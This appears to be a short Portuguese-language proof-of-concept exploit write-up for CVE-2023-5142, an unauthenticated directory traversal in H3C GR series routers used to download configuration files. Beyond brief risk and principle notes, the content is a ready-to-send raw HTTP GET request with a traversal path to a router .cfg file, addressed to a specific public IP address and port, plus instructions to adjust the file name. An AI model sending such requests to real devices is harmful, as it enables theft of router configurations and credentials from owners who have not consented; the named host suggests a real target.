
Exploit de PoC para CVE-2023-5142 direcionado a roteadores da série H3C GR, com uma vulnerabilidade de travessia de diretório não autenticada para extrair arquivos de configuração sensíveis.
Produto: Roteador da série GR
versão: todas
avaliação: alto risco
website: http://www.h3c.com/
Riscos: Os invasores podem explorar esta vulnerabilidade para obter informações confidenciais dos roteadores, construindo pacotes de solicitação especiais para contornar a verificação de identidade.
princípio: O roteador não autenticou o acesso ao diretório e aos arquivos relacionados
exp:
Nota: É necessário modificar o sufixo do nome do arquivo no POC, como GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image